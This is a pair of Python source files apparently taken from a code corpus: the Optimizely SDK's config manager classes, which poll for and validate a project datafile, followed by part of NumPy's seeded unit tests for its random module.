from .notification_center import NotificationCenter
from .helpers import enums
from .helpers import validator
from .optimizely_config import OptimizelyConfigService
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()})
class BaseConfigManager(ABC):
""" Base class for Optimizely's config manager. """
def __init__(self, logger=None, error_handler=None, notification_center=None):
""" Initialize config manager.
Args:
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Provides instance of notification_center.NotificationCenter.
"""
self.logger = optimizely_logger.adapt_logger(logger or optimizely_logger.NoOpLogger())
self.error_handler = error_handler or NoOpErrorHandler()
self.notification_center = notification_center or NotificationCenter(self.logger)
self._validate_instantiation_options()
def _validate_instantiation_options(self):
""" Helper method to validate all parameters.
Raises:
Exception if provided options are invalid.
"""
if not validator.is_logger_valid(self.logger):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('logger'))
if not validator.is_error_handler_valid(self.error_handler):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('error_handler'))
if not validator.is_notification_center_valid(self.notification_center):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('notification_center'))
@abc.abstractmethod
def get_config(self):
""" Get config for use by optimizely.Optimizely.
The config should be an instance of project_config.ProjectConfig."""
pass
class StaticConfigManager(BaseConfigManager):
""" Config manager that returns ProjectConfig based on provided datafile. """
def __init__(
self, datafile=None, logger=None, error_handler=None, notification_center=None, skip_json_validation=False,
):
""" Initialize config manager. Datafile has to be provided to use.
Args:
datafile: JSON string representing the Optimizely project.
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Notification center to generate config update notification.
skip_json_validation: Optional boolean param which allows skipping JSON schema
validation upon object invocation. By default
JSON schema validation will be performed.
"""
super(StaticConfigManager, self).__init__(
logger=logger, error_handler=error_handler, notification_center=notification_center,
)
self._config = None
self.optimizely_config = None
self.validate_schema = not skip_json_validation
self._set_config(datafile)
def _set_config(self, datafile):
""" Looks up and sets datafile and config based on response body.
Args:
datafile: JSON string representing the Optimizely project.
"""
if self.validate_schema:
if not validator.is_datafile_valid(datafile):
self.logger.error(enums.Errors.INVALID_INPUT.format('datafile'))
return
error_msg = None
error_to_handle = None
config = None
try:
config = project_config.ProjectConfig(datafile, self.logger, self.error_handler)
except optimizely_exceptions.UnsupportedDatafileVersionException as error:
error_msg = error.args[0]
error_to_handle = error
except Exception:
error_msg = enums.Errors.INVALID_INPUT.format('datafile')
error_to_handle = optimizely_exceptions.InvalidInputException(error_msg)
finally:
if error_msg:
self.logger.error(error_msg)
self.error_handler.handle_error(error_to_handle)
return
previous_revision = self._config.get_revision() if self._config else None
if previous_revision == config.get_revision():
return
self._config = config
self.optimizely_config = OptimizelyConfigService(config).get_config()
self.notification_center.send_notifications(enums.NotificationTypes.OPTIMIZELY_CONFIG_UPDATE)
self.logger.debug(
'Received new datafile and updated config. '
'Old revision number: {}. New revision number: {}.'.format(previous_revision, config.get_revision())
)
def get_config(self):
""" Returns instance of ProjectConfig.
Returns:
ProjectConfig. None if not set.
"""
return self._config
class PollingConfigManager(StaticConfigManager):
""" Config manager that polls for the datafile and updated ProjectConfig based on an update interval. """
DATAFILE_URL_TEMPLATE = enums.ConfigManager.DATAFILE_URL_TEMPLATE
def __init__(
self,
sdk_key=None,
datafile=None,
update_interval=None,
blocking_timeout=None,
url=None,
url_template=None,
logger=None,
error_handler=None,
notification_center=None,
skip_json_validation=False,
):
""" Initialize config manager. One of sdk_key or url has to be set to be able to use.
Args:
sdk_key: Optional string uniquely identifying the datafile.
datafile: Optional JSON string representing the project.
update_interval: Optional floating point number representing time interval in seconds
at which to request datafile and set ProjectConfig.
blocking_timeout: Optional time in seconds to block the get_config call until the config
object has been initialized.
url: Optional string representing URL from where to fetch the datafile. If set it supersedes the sdk_key.
url_template: Optional string template which in conjunction with sdk_key
determines URL from where to fetch the datafile.
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Notification center to generate config update notification.
skip_json_validation: Optional boolean param which allows skipping JSON schema
validation upon object invocation. By default
JSON schema validation will be performed.
"""
self._config_ready_event = threading.Event()
super(PollingConfigManager, self).__init__(
datafile=datafile,
logger=logger,
error_handler=error_handler,
notification_center=notification_center,
skip_json_validation=skip_json_validation,
)
self.datafile_url = self.get_datafile_url(
sdk_key, url, url_template or self.DATAFILE_URL_TEMPLATE
)
self.set_update_interval(update_interval)
self.set_blocking_timeout(blocking_timeout)
self.last_modified = None
self._polling_thread = threading.Thread(target=self._run)
self._polling_thread.daemon = True
self._polling_thread.start()
@staticmethod
def get_datafile_url(sdk_key, url, url_template):
""" Helper method to determine URL from where to fetch the datafile.
Args:
sdk_key: Key uniquely identifying the datafile.
url: String representing URL from which to fetch the datafile.
url_template: String representing template which is filled in with
SDK key to determine URL from which to fetch the datafile.
Returns:
String representing URL to fetch datafile from.
Raises:
optimizely.exceptions.InvalidInputException if:
- One of sdk_key or url is not provided.
- url_template is invalid.
"""
# Ensure that at least one of sdk_key or url is provided by the user.
if sdk_key is None and url is None:
raise optimizely_exceptions.InvalidInputException('Must provide at least one of sdk_key or url.')
# Return URL if one is provided or use template and SDK key to get it.
if url is None:
try:
return url_template.format(sdk_key=sdk_key)
except (AttributeError, KeyError):
raise optimizely_exceptions.InvalidInputException(
'Invalid url_template {} provided.'.format(url_template)
)
return url
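# For illustration (assumed template value, matching the SDK's public CDN):
# with url_template = 'https://cdn.optimizely.com/datafiles/{sdk_key}.json',
# get_datafile_url('abc123', None, url_template) returns
# 'https://cdn.optimizely.com/datafiles/abc123.json'.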
def _set_config(self, datafile):
""" Looks up and sets datafile and config based on response body.
Args:
datafile: JSON string representing the Optimizely project.
"""
if datafile or self._config_ready_event.is_set():
super(PollingConfigManager, self)._set_config(datafile=datafile)
self._config_ready_event.set()
def get_config(self):
""" Returns instance of ProjectConfig. Returns immediately if project config is ready otherwise
blocks maximum for value of blocking_timeout in seconds.
Returns:
ProjectConfig. None if not set.
"""
self._config_ready_event.wait(self.blocking_timeout)
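# Note: Event.wait() also returns once blocking_timeout elapses with the event
# still unset, so this may return None if no config has been fetched yet.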
return self._config
def set_update_interval(self, update_interval):
""" Helper method to set frequency at which datafile has to be polled and ProjectConfig updated.
Args:
update_interval: Time in seconds after which to update datafile.
"""
if update_interval is None:
update_interval = enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
self.logger.debug('Setting config update interval to default value {}.'.format(update_interval))
if not isinstance(update_interval, (int, float)):
raise optimizely_exceptions.InvalidInputException(
'Invalid update_interval "{}" provided.'.format(update_interval)
)
# If polling interval is less than or equal to 0 then set it to default update interval.
if update_interval <= 0:
self.logger.debug(
'update_interval value {} too small. Defaulting to {}'.format(
update_interval, enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
)
)
update_interval = enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
self.update_interval = update_interval
def set_blocking_timeout(self, blocking_timeout):
""" Helper method to set time in seconds to block the config call until config has been initialized.
Args:
blocking_timeout: Time in seconds to block the config call.
"""
if blocking_timeout is None:
blocking_timeout = enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
self.logger.debug('Setting config blocking timeout to default value {}.'.format(blocking_timeout))
if not isinstance(blocking_timeout, (numbers.Integral, float)):
raise optimizely_exceptions.InvalidInputException(
'Invalid blocking timeout "{}" provided.'.format(blocking_timeout)
)
# If blocking timeout is less than 0 then set it to default blocking timeout.
if blocking_timeout < 0:
self.logger.debug(
'blocking timeout value {} too small. Defaulting to {}'.format(
blocking_timeout, enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
)
)
blocking_timeout = enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
self.blocking_timeout = blocking_timeout
def set_last_modified(self, response_headers):
""" Looks up and sets last modified time based on Last-Modified header in the response.
Args:
response_headers: requests.Response.headers
"""
self.last_modified = response_headers.get(enums.HTTPHeaders.LAST_MODIFIED)
def _handle_response(self, response):
""" Helper method to handle response containing datafile.
Args:
response: requests.Response
"""
try:
response.raise_for_status()
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
# Leave datafile and config unchanged if the datafile has not been modified.
if response.status_code == http_status_codes.not_modified:
self.logger.debug('Not updating config as datafile has not been updated since {}.'.format(self.last_modified))
return
self.set_last_modified(response.headers)
self._set_config(response.content)
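# Illustrative flow: a 200 response stores Last-Modified via set_last_modified;
# fetch_datafile echoes it back as If-Modified-Since, so an unchanged datafile
# yields a 304 and takes the early return above.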
def fetch_datafile(self):
""" Fetch datafile and set ProjectConfig. """
request_headers = {}
if self.last_modified:
request_headers[enums.HTTPHeaders.IF_MODIFIED_SINCE] = self.last_modified
try:
response = requests.get(
self.datafile_url, headers=request_headers, timeout=enums.ConfigManager.REQUEST_TIMEOUT,
)
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
self._handle_response(response)
@property
def is_running(self):
""" Check if polling thread is alive or not. """
return self._polling_thread.is_alive()
def _run(self):
""" Triggered as part of the thread which fetches the datafile and sleeps until next update interval. """
try:
while self.is_running:
self.fetch_datafile()
time.sleep(self.update_interval)
except (OSError, OverflowError) as err:
self.logger.error(
'Error in time.sleep. Provided update_interval value may be too big. Error: {}'.format(str(err))
)
raise
def start(self):
""" Start the config manager and the thread to periodically fetch datafile. """
if not self.is_running:
self._polling_thread.start()
class AuthDatafilePollingConfigManager(PollingConfigManager):
""" Config manager that polls for authenticated datafile using access token. """
DATAFILE_URL_TEMPLATE = enums.ConfigManager.AUTHENTICATED_DATAFILE_URL_TEMPLATE
def __init__(
self,
datafile_access_token,
*args,
**kwargs
):
""" Initialize config manager. One of sdk_key or url has to be set to be able to use.
Args:
datafile_access_token: String to be attached to the request header to fetch the authenticated datafile.
*args: Refer to arguments descriptions in PollingConfigManager.
**kwargs: Refer to keyword arguments descriptions in PollingConfigManager.
"""
self._set_datafile_access_token(datafile_access_token)
super(AuthDatafilePollingConfigManager, self).__init__(*args, **kwargs)
def _set_datafile_access_token(self, datafile_access_token):
""" Checks for valid access token input and sets it. """
if not datafile_access_token:
raise optimizely_exceptions.InvalidInputException(
'datafile_access_token cannot be empty or None.')
self.datafile_access_token = datafile_access_token
def fetch_datafile(self):
""" Fetch authenticated datafile and set ProjectConfig. """
request_headers = {
enums.HTTPHeaders.AUTHORIZATION: enums.ConfigManager.AUTHORIZATION_HEADER_DATA_TEMPLATE.format(
datafile_access_token=self.datafile_access_token
)
}
if self.last_modified:
request_headers[enums.HTTPHeaders.IF_MODIFIED_SINCE] = self.last_modified
try:
response = requests.get(
self.datafile_url, headers=request_headers, timeout=enums.ConfigManager.REQUEST_TIMEOUT,
)
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
self._handle_response(response)
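# Hedged usage sketch, added for illustration; not part of the original
# config_manager.py. Assumption: 'my-sdk-key' is a placeholder, so a real SDK
# key (or url) is needed for the fetch to succeed; otherwise get_config()
# returns None after blocking_timeout.
if __name__ == '__main__':
    manager = PollingConfigManager(
        sdk_key='my-sdk-key',  # alternatively pass url=... to bypass the template
        update_interval=300,  # poll every five minutes
        blocking_timeout=10,  # get_config() blocks up to 10s for the first fetch
    )
    config = manager.get_config()  # ProjectConfig instance, or None on timeout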
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState,
np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use an md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is cast
# to np.int64, and `ubnd` is cast to np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
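# For illustration (not part of the original test): under that float64 cast,
# 2**63 - 1 and 2**63 round to the same double, so
# np.int64(2**63 - 1) == np.uint64(2**63) evaluated to True.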
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random(self):
np.random.seed(self.seed)
actual = np.random.random((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(np.random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(np.random.randint(0, -10, size=0).shape, (0,))
assert_equal(np.random.randint(10, 10, size=0).shape, (0,))
assert_equal(np.random.choice(0, size=0).shape, (0,))
assert_equal(np.random.choice([], size=(0,)).shape, (0,))
assert_equal(np.random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, np.random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, np.random.choice, a, p=p)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object), ("b", np.int32)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
